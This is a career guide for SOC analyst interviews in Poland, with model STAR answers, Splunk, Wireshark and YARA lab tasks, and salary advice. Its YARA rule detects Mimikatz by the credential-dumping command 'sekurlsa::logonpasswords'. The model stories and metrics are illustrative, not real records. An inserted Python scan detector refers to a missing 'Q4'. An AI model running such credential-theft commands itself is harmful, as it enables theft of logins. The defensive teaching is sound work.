STAR = Situation, Task, Action, Result. Structure your answer in 60-90 seconds. The Anglo-Saxon job market values numbers; without them the "result" is empty. "Reduced false positives by 40%" > "reduced false positives". Prepare 6-8 stories and map them to the typical questions.

B1. "Tell me about a time you handled a difficult incident."

S: During my TryHackMe Blue Team learning, I encountered a simulated ransomware on a Windows endpoint.
T: I needed to identify the malware family, trace lateral movement, and propose containment within 60 minutes.
A: I started with memory analysis using Volatility, identified WannaCry indicators, mapped to MITRE T1486, found C2 IP, and traced 2 lateral movements via SMB. I used Sysmon and Event Logs for timeline.
R: Completed in 47 minutes, identified all 3 affected hosts, proposed isolation strategy, and documented in IR report. Mentor flagged it as one of the cleanest investigations he reviewed.

B2. "Describe a time you made a mistake at work and what you learned."

S: In my first week as Tier 1, I escalated a critical alert without first verifying the parent process — turned out it was a legitimate IT script.
T: I had to own the false escalation publicly in the team standup.
A: I apologized, walked through what I should have checked (parent process, command line context, user account), and proposed a checklist update for similar EDR alerts. Then I shadowed a senior analyst on the next 5 similar alerts.
R: I never repeated this type of false positive. The checklist I proposed was adopted by the team. Lesson: verify before escalating.

B3. "Tell me about a conflict with a coworker."

S: A senior analyst was tagging tickets as "false positive" too quickly without thorough analysis, which created blind spots.
T: I needed to raise this without confronting them publicly or undermining their seniority.
A: I scheduled a 1-on-1, brought 3 specific examples where deeper analysis revealed real threats, and proposed pair triage for the next week to align our methodologies.
R: The senior analyst agreed, we paired for a week, and our team's mean detection accuracy improved by 18% in the next month. The relationship became collaborative.

B4. "Describe a time you had to learn something new quickly."

S: My team migrated from QRadar to Microsoft Sentinel and I had 2 weeks to become operational with KQL (Kusto Query Language).
T: I needed to maintain my T1 alert volume during the transition.
A: I committed to 1 hour daily of Microsoft Learn KQL course, plus translating 5 existing QRadar AQL queries to KQL each day. I joined a Slack channel of KQL practitioners.
R: By end of week 2, I was independently writing KQL hunting queries. By week 4, I had translated 60 of our 80 standard queries. My senior recognized the pace in my next 1-on-1.

B5. "Tell me about a time you had to make a decision under pressure."

S: During a Friday night shift, I detected unusual outbound traffic from a database server to an unknown IP in Russia.
T: I had to decide: isolate the server (would impact Saturday morning operations) or wait until Monday for senior approval.
A: I called the on-call senior, gave 60-second briefing with key indicators (volume, destination, beaconing pattern). With his consent, isolated the server. Documented every action in the incident ticket.
R: Investigation Monday confirmed it was an exfiltration attempt by a compromised service account. Saturday operations were partially affected, but full breach was prevented. Senior credited me in the post-incident review.

B6. "Tell me about a time you helped a colleague."

S: A new T1 analyst was struggling with Splunk SPL queries during her first week.
T: Without breaking my own SLA, I needed to onboard her efficiently.
A: I created a 2-page SPL cheat sheet from my own notes, walked her through 3 common queries during my breaks, and shared a personal Anki deck of 40 SPL patterns I had built.
R: She was independently writing queries by week 2 (vs 4-week average). The cheat sheet was adopted as onboarding material. We're still close colleagues 8 months later.

B7. "Describe a project you're proud of."

S: My team's MITRE ATT&CK coverage was at 38%, with key gaps in Credential Access and Lateral Movement.
T: I volunteered to lead a coverage improvement initiative — outside my T1 duties.
A: I built an ATT&CK heatmap in Splunk, identified 23 missing detection rules, wrote and tested 18 of them in 6 weeks, with peer review from our Detection Engineer.
R: Coverage went from 38% to 64%. We caught 3 real APT-style attempts in the next quarter that previously would have been missed. I was promoted to T2 6 months later.

B8. "Where do you see yourself in 5 years?"

A: In 5 years, I see myself as a Threat Hunter or Detection Engineer — combining hands-on incident analysis with strategic detection design. To get there, I plan to: (1) move from T1 to T2 in year 1-2, (2) earn CompTIA CySA+ and SANS GCIH in years 2-3, (3) develop deep expertise in one specific area (likely cloud security given the trend). I value joining a SOC where mentorship and learning paths are structured — I noticed your company sponsors GIAC certifications, which aligns with my plan.

Live lab: Splunk, Wireshark, YARA

The live lab is a practical task and often decides the outcome of the interview. Below are the three most common formats with sample tasks.

Lab 1: Splunk SPL — find brute force from auth logs

Task: "Given the dataset, identify any brute force attempts from external IPs in the last 24 hours."

Model query:

index=auth_logs sourcetype=linux_secure earliest=-24h "Failed password"
| where NOT cidrmatch("10.0.0.0/8", src_ip) AND NOT cidrmatch("172.16.0.0/12", src_ip) AND NOT cidrmatch("192.168.0.0/16", src_ip)
| stats count by src_ip, user
| eventstats avg(count) as avg_count
| where count > 50 AND count > 3*avg_count
| sort -count

Commentary: you filter failed logons, group by IP/user, apply a threshold of 50+ attempts, and highlight the outliers (3x the average). A senior analyst likes to see that you justify the threshold rather than guess it.

Lab 2: Wireshark — analyze suspicious PCAP

Task: "Open this PCAP and tell me what's happening."

Model order of steps:

  1. Statistics → Conversations: top talkers, which traffic dominates.
  2. Statistics → Endpoints: which endpoint generates most of the traffic.
  3. Filter: tcp.flags.syn==1 and tcp.flags.ack==0: port scan / SYN flood?
  4. Filter: dns: DNS queries to odd domains.
  5. Filter: http.request: User-Agent, URL paths.
  6. File → Export Objects → HTTP: extract the files transferred over HTTP.
  7. Conclusions based on the pattern (e.g., 1 src_ip → 100 dst_ports in 10 seconds = port scan).
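Steps 3 and 7 above (the SYN-only filter and the "1 src_ip → 100 dst_ports in 10 seconds" rule) together with the handshake states from Q4, as one added Python example (not the article's code) over a constructed list of TCP segments rather than a real PCAP. It walks each flow through SYN → SYN-ACK → ACK, counts per server the connections that stall after the server's SYN-ACK (the SYN-flood symptom Q4 describes), and applies a sliding 10-second window for the port-scan heuristic. Addresses, ports and the 100-port threshold are constructed; `flags == "S"` plays the role of Wireshark's `tcp.flags.syn==1 and tcp.flags.ack==0`.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Packet:
    """One TCP segment reduced to what the tcp.flags filters look at.
    flags: 'S' = SYN only, 'SA' = SYN+ACK, 'A' = ACK only."""
    ts: float
    src: str
    dst: str
    sport: int
    dport: int
    flags: str


Flow = Tuple[str, str, int, int]  # (client, server, client port, server port)


def track_handshakes(packets: List[Packet]) -> Dict[Flow, str]:
    """Walk each flow through the three-way handshake.
    States: 'syn_sent' (step 1), 'syn_received' (step 2), 'established' (step 3)."""
    state: Dict[Flow, str] = {}
    for p in sorted(packets, key=lambda p: p.ts):
        if p.flags == "S":                       # step 1: client -> server
            state[(p.src, p.dst, p.sport, p.dport)] = "syn_sent"
        elif p.flags == "SA":                    # step 2: server -> client, so reverse the tuple
            flow = (p.dst, p.src, p.dport, p.sport)
            if state.get(flow) == "syn_sent":
                state[flow] = "syn_received"
        elif p.flags == "A":                     # step 3: client -> server completes it
            flow = (p.src, p.dst, p.sport, p.dport)
            if state.get(flow) == "syn_received":
                state[flow] = "established"
    return state


def half_open_per_server(state: Dict[Flow, str]) -> Dict[str, int]:
    """SYN flood symptom: connections the server answered that never receive the final ACK."""
    counts: Dict[str, int] = defaultdict(int)
    for (_, server, _, _), s in state.items():
        if s == "syn_received":
            counts[server] += 1
    return dict(counts)


def detect_port_scans(packets: List[Packet], window: float = 10.0, min_ports: int = 100) -> Dict[str, int]:
    """Step 7 heuristic: one source sending SYNs to >= min_ports distinct ports within `window`
    seconds. Returns source -> peak number of distinct ports seen in any window."""
    by_src: Dict[str, List[Packet]] = defaultdict(list)
    for p in sorted(packets, key=lambda p: p.ts):
        if p.flags == "S":                       # the step-3 filter: SYN set, ACK clear
            by_src[p.src].append(p)
    scanners: Dict[str, int] = {}
    for src, syns in by_src.items():
        port_counts: Dict[int, int] = defaultdict(int)
        peak, j = 0, 0
        for p in syns:
            port_counts[p.dport] += 1
            while syns[j].ts < p.ts - window:    # drop SYNs that fell out of the window
                old = syns[j].dport
                port_counts[old] -= 1
                if port_counts[old] == 0:
                    del port_counts[old]
                j += 1
            peak = max(peak, len(port_counts))
        if peak >= min_ports:
            scanners[src] = peak
    return scanners


def make_sample_capture() -> List[Packet]:
    """Constructed capture (not a real PCAP): one normal HTTPS handshake, a 120-port scan
    finished in 6 seconds, and 300 half-open connections against a web server."""
    pkts = [
        Packet(0.000, "10.0.0.5", "93.184.216.34", 51000, 443, "S"),
        Packet(0.020, "93.184.216.34", "10.0.0.5", 443, 51000, "SA"),
        Packet(0.021, "10.0.0.5", "93.184.216.34", 51000, 443, "A"),
    ]
    for i in range(120):                         # scanner: a new dport every 50 ms, never completes
        pkts.append(Packet(1.0 + 0.05 * i, "198.51.100.9", "10.0.0.20", 40000 + i, 1 + i, "S"))
    for i in range(300):                         # flood: many sources, server answers, no final ACK
        src = f"203.0.113.{i % 250 + 1}"
        pkts.append(Packet(5.0 + 0.01 * i, src, "10.0.0.30", 50000 + i, 80, "S"))
        pkts.append(Packet(5.001 + 0.01 * i, "10.0.0.30", src, 80, 50000 + i, "SA"))
    return pkts
```

Note the two different signals: the scanner's flows stay in `syn_sent` (scanned ports may answer, but the scanner never completes), whereas the flood leaves the server holding `syn_received` state, which is the resource exhaustion Q4 refers to.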

Lab 3: YARA rule — write a detection rule

Task: "Write a YARA rule to detect malware that uses the string 'Mimikatz' and a known PE header."

Model rule:

rule Mimikatz_Detection {
    meta:
        author = "SOC Analyst"
        description = "Detects Mimikatz tool"
        date = "2026-05-01"
    strings:
        $mz = { 4D 5A }
        $mimikatz_str = "mimikatz" nocase
        $sekurlsa = "sekurlsa::logonpasswords" nocase
    condition:
        $mz at 0 and ($mimikatz_str or $sekurlsa)
}

Commentary: $mz at 0 means the file starts with the MZ header of a PE file (0x4D5A = "MZ"). nocase makes the string match case-insensitive. The condition: the file must carry the MZ header AND contain a characteristic Mimikatz string.

7 questions to ask the employer

Do NOT skip this section. Having no questions signals a lack of interest. Questions should be specific, prepared, and show that you researched the company:

  1. What does a typical day look like for a SOC Tier 1 analyst here? (a daily reality check)
  2. What SIEM and EDR platforms do you use? (shows you know the stack and are thinking about adapting to it)
  3. How is the SOC structured? T1 / T2 / T3 split, or something different? (you understand this shapes your promotion path)
  4. What's your average alert volume per shift, and what's the false positive rate? (operational reality; a senior will answer honestly)
  5. How does the team approach professional development? Sponsoring certifications, conferences, training time? (your investment)
  6. What does promotion from T1 to T2 typically look like in terms of timeline and criteria? (shows long-term thinking)
  7. What's the biggest challenge the SOC faces right now? (shows empathy and prepares you for the realities)

Anti-pattern: NIE pytaj o salary/benefits/PTO w tym etapie. Te tematy idą do HR po offerze.

Salary negotiation in Poland

What to know before negotiating

Check the ranges on No Fluff Jobs and JustJoinIT for the specific role and location. That is data from thousands of postings. Realistic 2026 ranges:

  • SOC Tier 1 (junior, 0-2 years): 7-12k PLN gross / month (B2B 50-80 PLN/h)
  • SOC Tier 2 (mid, 2-4 years): 12-18k gross (B2B 90-130 PLN/h)
  • SOC Tier 3 / Threat Hunter (4+ years): 18-30k (B2B 150-220 PLN/h)
  • DFIR / Detection Engineer: 18-28k
  • SOC Manager: 25-40k

4-step strategy

  1. Don't give a number first. If the recruiter asks „what's your expectation", answer „I'd like to learn more about the role first — what's the budget for this position?". In 60% of cases the recruiter will give the range.
  2. When you must give one, give a range at the upper end of the market + 10-15%. If the market range is 8-12k, say 12-14k. Negotiation usually lands in the middle.
  3. If the offer is lower, counter-offer with justification. Not „I want more". Only „based on (skills X, Y, Z) and the market data showing 12-15k for this role, I'd be looking at 14k". Specifics + market data.
  4. If the budget is locked, negotiate everything else. Sign-on bonus, extra vacation days, certification sponsorship (3-5k PLN/year), home office days, equipment allowance. These „smaller" elements can add +20% to the value of the package.

What NOT to say

  • „I need X because of my mortgage" — your finances are not their problem.
  • „Friend earns Y at competitor" — unverifiable, a weak argument.
  • „I'll accept anything" — immediately lowers your value.
  • „I have another offer" when it isn't true — it will come out and destroy trust.

10 mistakes Polish candidates make

[Figure: 10 mistakes Polish candidates make in a SOC Analyst interview; 5×2 grid of icons: no scenario practice, translating from Polish, no industry updates, guessing, shallow projects, weak STAR, no numbers, wrong questions, no hands-on practice, applying too early]

Mistake 1 — No scenario practice

❌ The candidate knows the theory (CIA Triad, NIST IR phases) but gets lost on „what would you do if a user clicked a phishing link".

✅ Practice 10-15 scenarios out loud, with a timer. TryHackMe, BTL1 Labs, the „Scenarios" section on ITPro.tv.

Mistake 2 — Translating from Polish to English on the fly

❌ The candidate formulates the answer in Polish, then translates it. Result: slow, hesitant, „umm", „how to say".

✅ Train yourself to think in English. Record yourself. Listen to cyber podcasts in English every day (Darknet Diaries, CyberWire).

Mistake 3 — Not keeping up with the industry

❌ Talks about WannaCry (2017) instead of LockBit, BlackCat (2024). Shows they don't read the news.

✅ 15 minutes daily: KrebsOnSecurity, BleepingComputer, The Record. Weekly: r/cybersecurity. Monthly: CrowdStrike Global Threat Report.

Mistake 4 — Avoiding „I don't know"

❌ The candidate guesses on questions they don't know. The manager can tell.

✅ „I'm not familiar with that specific term — could you give me a hint? My reasoning would be X..." The manager prefers honesty.

Mistake 5 — Shallow knowledge of your own projects

❌ The CV lists „TryHackMe rooms", but the candidate can't describe what they learned.

✅ For every project on the CV: a 3-sentence description (what + how + what I learned). Be ready for 5 minutes of deep questioning.

Mistake 6 — Weak STAR structure

❌ Behavioral answer = 5 minutes of chaos with no structure.

✅ STAR in 60-90 seconds: Situation 15s · Task 10s · Action 40s · Result 20s. Result ALWAYS with numbers.

Mistake 7 — No numbers in the Result

❌ „I improved detection." (empty, unmeasurable)

✅ „I improved detection coverage from 38% to 64% in 6 weeks, catching 3 APT-style attempts the next quarter." The Anglo-Saxon market values NUMBERS.

Mistake 8 — Wrong questions to the employer

❌ „How much vacation will I get?" in the technical interview.

✅ Salary/benefits topics go to HR after the offer. In the technical interview ask about the stack, daily work, growth path.

Mistake 9 — No hands-on practice

❌ The candidate knows attack theory but has never used Wireshark / Splunk / EDR.

✅ TryHackMe „Pre Security" + „SOC Level 1", BTL1 Lab access (3 months, 350 USD), free CyberDefenders.

Mistake 10 — Applying too early

❌ You apply after 2 weeks of studying for Security+ with no certificate, no projects, no B2 English.

✅ Realistic baseline: Security+ obtained + B2 English + 2-3 hands-on projects (TryHackMe + one home lab) = then apply.

Links for further reading

FAQ — frequently asked questions

What are the stages of a SOC Analyst interview?

4 stages: HR phone screen (30 min) → Technical (45-60 min) → Hands-on lab (60-120 min) → Behavioral (45 min). 2-4 weeks in total.

Is the interview in English in Poland?

In 90% of cases YES. Polish SOCs serve global clients. Requirement: B2+ English, spoken and written.

Which technical questions come up most often?

CIA Triad, defense in depth, IDS vs IPS, SIEM, NIST IR phases, MITRE ATT&CK, TCP/UDP, common ports, IOC vs IOA, phishing variants, DDoS detection.

What is a scenario question?

A simulation of a real situation: „User clicked phishing", „PowerShell suspicious on prod server". Key: containment first, gather evidence, escalate appropriately.

What is a live lab?

A practical task: Splunk SPL query, Wireshark PCAP, YARA rule, Linux investigation, Windows Event Log. 60-120 minutes.

Realistic salary ranges for a SOC Analyst in Poland?

T1 7-12k gross, T2 12-18k, T3 / Threat Hunter 18-30k, SOC Manager 25-40k. Big Tech +30-50%.

Which certifications help?

T1: Security+ (90% of postings). T2: Security+ plus CySA+ / BTL1. T3: SANS GIAC, CISSP. Lacking a certificate extends the time to a first offer by 3-6 months.

The biggest mistakes Polish candidates make?

(1) No scenario practice, (2) translating from Polish to English on the fly, (3) not following industry news, (4) avoiding „I don't know", (5) shallow knowledge of their own projects.

Candidate: „I have 500 hours on TryHackMe Pre Security." Manager: „Cool, walk me through how Mimikatz extracts credentials from memory." Candidate: „... Mimi-what?". Hours on a platform ≠ knowledge. You must be able to defend every project on your CV in a 5-minute deep dive. Better 2 projects in depth than 10 superficially.